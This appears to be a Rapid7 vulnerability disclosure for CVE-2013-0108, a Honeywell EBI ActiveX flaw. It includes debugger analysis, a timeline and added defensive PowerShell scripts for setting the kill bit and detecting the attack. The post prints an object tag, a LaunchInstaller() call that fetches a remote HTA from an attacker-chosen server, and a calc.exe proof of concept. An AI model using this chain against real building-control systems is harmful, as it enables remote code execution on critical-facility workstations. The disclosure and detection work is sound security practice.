Today, we present to you a new vulnerability, CVE-2013-0108, discovered in Honeywell Enterprise Buildings Integrator (EBI) R310 - R410.2. "This platform is used to integrate different systems and devices such as heating, ventilation, and air conditioning (HVAC) controls; security; access control; life safety; lighting; energy management; and facilities management into a common platform. Using open architecture and industry standards, EBI integrates existing buildings systems, providing seamless digital information and control across all building operational management systems." Following our standard disclosure policy, we notified both Honeywell and CERT/CC, who in turn coordinated with ICS-CERT. Quoting from the ICS-CERT advisory ICSA-13-053-02:

Exploitation of this vulnerability could allow partial loss of availability, integrity, and confidentiality and could be exploited remotely. This vulnerability could affect systems deployed in the government facilities and commercial facilities sectors.

The vulnerability could allow remote attackers to execute arbitrary code via a specially crafted HTML document. The attacker would require an end-user or operator to voluntarily interact with the attack mechanism for it to be successful. For example, the attacker could send an email message to the end-user, containing a link to a Web site with the specially crafted HTML document. CVE-2013-0108 has been assigned to this vulnerability with a CVSS v2 base score of 6.8.

Now, before you read any further, if you own or operate one of these building control systems, you really should take a few moments and spend quality time with your Honeywell sales and service representative to ask about getting the latest Station Security Update Package. When we first reported this to Honeywell, their responsiveness and concern were both prompt and thorough, so it's clear to all of us at Rapid7 that Honeywell definitely has their customers' security interests at heart. From a disclosure standpoint, Honeywell's response was A++++, would exploit again. (:

Vulnerability Summary
The specific flaw exists within the HSC Remote Deploy ActiveX (HSCRemoteDeploy.dll), with the class ID "0D080D7D-28D2-4F86-BFA1-D582E5CE4867". This control is used to support installation of Honeywell HMIWeb Browser on workstation clients. The LaunchInstaller() method, provided by the vulnerable control, can be abused to run an arbitrary HTA application through mshta.exe.
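As an added example (not code from the Rapid7 post or from Honeywell), the following PowerShell script checks whether the HSC Remote Deploy control is registered on a workstation and whether Internet Explorer's kill bit for its CLSID is set, and can set it; the registry paths are the standard ActiveX Compatibility keys, and the -Remediate switch is this script's own.

```powershell
# Added example (not from the Rapid7 post): check whether the HSCRemoteDeploy
# control (CLSID from the advisory) is registered on this host and whether
# Internet Explorer's kill bit blocks it. Run from an elevated prompt.
# -Remediate sets the kill bit (Compatibility Flags 0x400), the same control
# the Microsoft kill-bit update in the timeline applies.
param([switch]$Remediate)

$Clsid   = '{0D080D7D-28D2-4F86-BFA1-D582E5CE4867}'  # HSC Remote Deploy ActiveX
$KillBit = 0x400                                     # kill bit flag (MS KB 240797)

# Both registry views matter: 32-bit IE on x64 Windows reads Wow6432Node.
$CompatKeys = @(
    "HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\$Clsid",
    "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\$Clsid"
)
$ClassKeys = @(
    "HKLM:\SOFTWARE\Classes\CLSID\$Clsid\InprocServer32",
    "HKLM:\SOFTWARE\Classes\Wow6432Node\CLSID\$Clsid\InprocServer32"
)

# Is the control registered at all? (InprocServer32 default value = DLL path)
foreach ($k in $ClassKeys) {
    if (Test-Path $k) {
        $dll = (Get-ItemProperty -Path $k).'(default)'
        Write-Host "Control registered: $k -> $dll"
    }
}

foreach ($k in $CompatKeys) {
    $flags = 0
    if (Test-Path $k) {
        $v = Get-ItemProperty -Path $k -Name 'Compatibility Flags' -ErrorAction SilentlyContinue
        if ($v) { $flags = [int]$v.'Compatibility Flags' }
    }
    $blocked = ($flags -band $KillBit) -ne 0
    Write-Host ("{0}: Compatibility Flags=0x{1:X} kill bit set={2}" -f $k, $flags, $blocked)

    if (-not $blocked -and $Remediate) {
        if (-not (Test-Path $k)) { New-Item -Path $k -Force | Out-Null }
        Set-ItemProperty -Path $k -Name 'Compatibility Flags' `
            -Value ($flags -bor $KillBit) -Type DWord
        Write-Host "  -> kill bit set for $Clsid under $k"
    }
}
```

Setting the kill bit only stops Internet Explorer from instantiating the control; the Station Security Update Package from Honeywell is still needed to fix the control itself.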
Disclosure Timeline
Date | Description
---|---
2013-01-08 | Initial discovery by Juan Vazquez, Metasploit Researcher
2013-01-08 | Metasploit module written
2013-01-10 | Initial disclosure to the vendor, Honeywell
2013-01-10 | Initial response from the vendor
2013-01-25 | Disclosure to CERT/CC
2013-01-30 | Disclosure coordination with vendor, CERT/CC, and ICS-CERT
2013-02-04 | Vendor advisory bulletin and patch drafted
2013-02-22 | Vendor advisory bulletin and patch release
2013-02-22 | ICS-CERT Advisory published
2013-03-11 | Public disclosure and Metasploit modules published
2013-03-12 | Kill bits released on Microsoft Patch Tuesday (proposed)

A remote page can make Internet Explorer load the vulnerable ActiveX control by referencing its class ID:

```html
<object id="RemoteInstaller" classid="clsid:0D080D7D-28D2-4F86-BFA1-D582E5CE4867"></object>
```

The vulnerable ActiveX control is then loaded by Internet Explorer, as seen in the debugger:

```
0:006> g
ModLoad: 020b0000 020e7000   C:\WINDOWS\system32\HSCRemoteDeploy.dll
eax=00000003 ebx=00000000 ecx=020de070 edx=f20b0000 esi=00255ba8 edi=00000000
eip=7c90e4f4 esp=00137dc0 ebp=00137eb4 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
ntdll!KiFastSystemCallRet:
7c90e4f4 c3              ret
0:000> lmv m HSCRemoteDeploy
start    end        module name
020b0000 020e7000   HSCRemoteDeploy   (deferred)
    Image path: C:\WINDOWS\system32\HSCRemoteDeploy.dll
    Image name: HSCRemoteDeploy.dll
    Timestamp:        Wed Sep 29 13:51:06 2010 (4CA3282A)
    CheckSum:         0003DCC8
    ImageSize:        00037000
    File version:     5.7.165.119
    Product version:  5.7.165.119
    File flags:       0 (Mask 3F)
    File OS:          4 Unknown Win32
    File type:        2.0 Dll
    File date:        00000000.00000000
    Translations:     0409.04b0
    CompanyName:      Honeywell Limited
    ProductName:      HMIWeb
    FileVersion:      5, 7, 165, 119
    PrivateBuild:     Official build
    FileDescription:  Unicode Release Build
    LegalCopyright:   Copyright 2008 Honeywell International Sàrl
    LegalTrademarks:  Copyright 2008 Honeywell International Sàrl
```

Once loaded, the LaunchInstaller() method can be used to execute an arbitrary remote HTA application by passing an arbitrary URI as the "bstrServer" parameter. The prototype for this method is:

```vb
Sub LaunchInstaller (
    ByVal bstrServer As String,
    ByVal bstrRedirect As String,
    ByVal bUpgrade As Boolean
)
```

It can be abused from script such as:

```javascript
RemoteInstaller.LaunchInstaller("http://192.168.1.128:8080", "", false);
```

The above LaunchInstaller() call translates into the following call to ShellExecuteExW, with a pointer to the SHELLEXECUTEINFO structure stored at 0013e200 as its argument:

```
0:000> bp HSCRemoteDeploy+866A
0:000> g
Breakpoint 0 hit
eax=020d2644 ebx=0210246c ecx=021023e8 edx=0013e200 esi=00000000 edi=0013e26c
eip=020b866a esp=0013e1ec ebp=0013e254 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
HSCRemoteDeploy!DllUnregisterServer+0x2e4a:
020b866a ff10            call    dword ptr [eax]      ds:0023:020d2644=d68d0b02
0:000> t
eax=020d2644 ebx=0210246c ecx=021023e8 edx=0013e200 esi=00000000 edi=0013e26c
eip=020b8dd6 esp=0013e1e8 ebp=0013e254 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
HSCRemoteDeploy!DllUnregisterServer+0x35b6:
020b8dd6 ff253c120d02    jmp     dword ptr [HSCRemoteDeploy!DllUnregisterServer+0x1ba1c (020d123c)] ds:0023:020d123c={SHELL32!ShellExecuteExW (7ca02f03)}
0:000> dd esp L2
0013e1e8  020b866c 0013e200
```

The SHELLEXECUTEINFO structure passed as the parameter contains the following values (lpVerb, lpFile and lpParameters sit at offsets 0xC, 0x10 and 0x14 of the 32-bit structure):

```
0:000> du poi(0013e200+C)
021040ac  "open"
0:000> du poi(0013e200+10)
0210246c  "C:\WINDOWS\system32\mshta.exe"
0:000> du poi(0013e200+14)
02104014  "http://192.168.1.128:8080/System"
02104054  "Displays/RemoteInstallWelcome.ht"
02104094  "a"
```

The location of the HTA application to be opened via mshta.exe can be influenced by the "bstrServer" parameter, which leads to remote HTA code execution.
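As an added example (not from the original post), the following PowerShell script hunts for the process pattern just described, mshta.exe started by Internet Explorer with a remote URL, in Sysmon process-creation events; Sysmon logging and the EBI server name in $TrustedHosts are assumptions, since the legitimate HMIWeb installer produces the same parent/child pair pointed at the real EBI server.

```powershell
# Added example (not from the Rapid7 post): find mshta.exe launched by Internet
# Explorer with an http(s) URL on the command line, using Sysmon Event ID 1.
# Assumes Sysmon is installed; $TrustedHosts holds placeholder EBI server names,
# because the genuine RemoteInstallWelcome.hta is also opened this way.
param(
    [string[]]$TrustedHosts = @('ebi-server.example.local'),  # legitimate EBI servers
    [int]$Hours = 24
)

$since  = (Get-Date).AddHours(-$Hours)
$events = Get-WinEvent -FilterHashtable @{
    LogName   = 'Microsoft-Windows-Sysmon/Operational'
    Id        = 1
    StartTime = $since
} -ErrorAction SilentlyContinue

foreach ($ev in $events) {
    # Pull the named EventData fields (Image, ParentImage, CommandLine, ...) out of the XML.
    $x = [xml]$ev.ToXml()
    $d = @{}
    foreach ($item in $x.Event.EventData.Data) { $d[$item.Name] = $item.'#text' }

    if ($d.Image       -notmatch '\\mshta\.exe$')    { continue }
    if ($d.ParentImage -notmatch '\\iexplore\.exe$') { continue }

    # Extract the host part of the first http(s) URL on the command line.
    if ($d.CommandLine -match '(?i)https?://([^\s"/:]+)') {
        $urlHost = $Matches[1]
    } else {
        continue
    }

    # Parent + remote URL alone is not enough: flag only hosts that are not EBI servers.
    if ($TrustedHosts -notcontains $urlHost) {
        [pscustomobject]@{
            Time        = $ev.TimeCreated
            User        = $d.User
            ParentImage = $d.ParentImage
            CommandLine = $d.CommandLine
            UrlHost     = $urlHost
        }
    }
}
```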
Exploitation
Since an arbitrary HTA application can be executed, arbitrary code execution follows. The MSDN article Introduction to HTML Applications (HTAs) explains why:

As fully trusted applications, HTAs carry out actions that Internet Explorer would never permit in a webpage. The result is an application that runs seamlessly, without interruption.

In HTAs, the restrictions against allowing script to manipulate the client machine are lifted. For example, all command codes are supported without scripting limitations (see command id). And HTAs have read/write access to the files and system registry on the client machine.

The trusted status of HTAs also extends to all operations subject to security zone options. In short, zone security is off. Consequently, HTAs run embedded Microsoft ActiveX controls and Java applets irrespective of the zone security setting on the client machine. No warning displays before such objects are run within an HTA. HTAs run outside of the Internet Explorer process, and therefore are not subject to the security restrictions imposed by Protected Mode when run on Windows Vista.

As a simple proof of concept, the following HTA application launches calc.exe:

```html
<script>
  a = new ActiveXObject("WScript.Shell");
  a.run('%windir%\\System32\\calc.exe');
  window.close();
</script>
```

In order to achieve remote code execution, a Metasploit module has been developed. The module has been tested successfully on Windows XP and Windows 7 with Internet Explorer 6 through Internet Explorer 9.
Want to try this out for yourself? Get your free Metasploit download now or update your existing installation, and let us know if you have any further questions.
Source: https://community.rapid7.com/community/metasploit/blog/2013/03/11/cve-2013-0108-honeywell-ebi